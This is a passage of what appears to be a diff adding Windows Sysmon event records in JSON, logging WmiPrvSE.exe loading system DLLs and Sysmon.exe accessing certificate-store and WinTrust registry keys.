"WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "cscapi.dll", + "image_path": "C:\\Windows\\System32\\cscapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "msdtcuiu.dll", + "image_path": "C:\\Windows\\System32\\msdtcuiu.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "browcli.dll", + "image_path": "C:\\Windows\\System32\\browcli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "atl.dll", + "image_path": "C:\\Windows\\System32\\atl.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "msdtcprx.dll", + "image_path": "C:\\Windows\\System32\\msdtcprx.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "mtxclu.dll", + "image_path": "C:\\Windows\\System32\\mtxclu.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\System32\\winspool.drv", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 